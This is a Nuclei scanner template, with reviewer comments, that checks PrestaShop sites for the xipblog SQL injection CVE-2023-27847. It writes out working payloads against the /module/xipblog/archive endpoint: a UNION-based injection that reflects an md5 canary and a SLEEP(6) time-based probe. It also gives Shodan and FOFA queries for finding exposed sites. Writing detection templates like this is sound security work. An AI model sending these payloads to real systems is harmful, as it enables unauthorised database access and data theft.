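# Nuclei template: PrestaShop xipblog module, unauthenticated SQL injection (CVE-2023-27847).
#
# Two-stage check (see `flow` below): a fingerprint request gates the scan, then
# two SQLi payloads are sent against /module/xipblog/archive. A union-based match
# (controlled value reflected in the body) is the high-confidence signal; the
# time-based match is a lower-confidence fallback and is subject to the
# false-positive caveat noted on its matcher.
#
# NOTE(review): the original listing had lost all YAML indentation (every key at
# column 0, which does not parse into the structure nuclei expects); the nesting
# below is reconstructed. Any change to the file content — including these
# comments — invalidates the `# digest:` signature at the bottom; re-sign before
# use or nuclei will not treat it as a verified template.

id: CVE-2023-27847

info:
  name: PrestaShop xipblog - SQL Injection
  author: mastercho
  severity: critical
  # The patched release (2.0.1) shipped without a version bump, so a version
  # check cannot establish exposure — only an active probe like this one can.
  description: |
    In the blog module (xipblog), an anonymous user can perform SQL injection. Even though the module has been patched in version 2.0.1, the version number was not incremented at the time.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access and data leakage.
  reference:
    - https://security.friendsofpresta.org/modules/2023/03/23/xipblog.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27847
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27847
    cwe-id: CWE-89
    epss-score: 0.04685
    epss-percentile: 0.91818
  metadata:
    verified: true
    # NOTE(review): the template defines three raw requests in total (one
    # fingerprint probe plus two payloads); confirm whether this count should
    # reflect that rather than the two payload requests alone.
    max-request: 2
    framework: prestashop
    shodan-query: 'html:"/xipblog"'
    fofa-query: app="Prestashop"
  tags: time-based-sqli,cve,cve2023,prestashop,sqli,xipblog

# Only run the payload stage when the fingerprint stage matched.
flow: http(1) && http(2)

variables:
  # Quoted so YAML keeps it a string; its md5 is the canary looked for in the
  # union-based response.
  num: "999999999"

http:
  # Stage 1: fingerprint. The matcher is `internal`, so a bare PrestaShop/xipblog
  # hit is never reported on its own — it only unlocks stage 2.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(tolower(response), "prestashop", "xipblog")'
        internal: true

  # Stage 2: two payloads injected through the `subpage_type` parameter (the
  # leading `"` closes the string literal in the vulnerable query).
  #   Request 1 — UNION ALL SELECT with 29 columns; column 27 carries
  #               CONCAT(md5(num)) so the canary is reflected into the page.
  #   Request 2 — boolean-free time-based probe, SLEEP(6).
  # Both are active payloads against the backing database; the SLEEP holds a
  # DB connection for 6 s per request, so rate-limit against production hosts.
  # `@timeout: 20s` raises the per-request timeout so the 6 s sleep is not cut
  # off and misreported by the default timeout.
  - raw:
      - |
        @timeout: 20s
        GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 20s
        GET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(6)))AuDU)--+lafl HTTP/1.1
        Host: {{Hostname}}

    # Requests are sent in order and stop as soon as one matcher fires, so the
    # reliable union-based check runs first and the sleep payload is only sent
    # if the canary was not reflected.
    stop-at-first-match: true
    # Follows redirects even when they leave the original host; check that this
    # does not walk the scan outside the authorised scope.
    host-redirects: true
    matchers:
      # High confidence: the md5 of our own value appears in the response to
      # request 1, which only happens if the injected SELECT was executed.
      - type: word
        name: union-based
        part: body_1
        words:
          - '{{md5({{num}})}}'

      # Lower confidence: request 2 took at least as long as the injected
      # SLEEP(6). A target that is slow for unrelated reasons (load, WAF
      # tarpit, upstream latency) satisfies this too — confirm a time-based-only
      # hit manually, e.g. re-run with a different sleep value and compare.
      - type: dsl
        name: time-based
        dsl:
          - 'duration_2>=6'

# Template signature. Covers the template content (excluding this line); it no
# longer matches once the file above has been edited and must be regenerated.
# digest: 4a0a00473045022100ee8271677f415ca4c4b08feef9da01311967e2b3edba130957466c852f81abdc02205b5163cdbae603a0d7d2ee225ddf03cb7c0dc41baaa66702977a26a34d94c5ae:922c64590222798bb761d5b6d8e72950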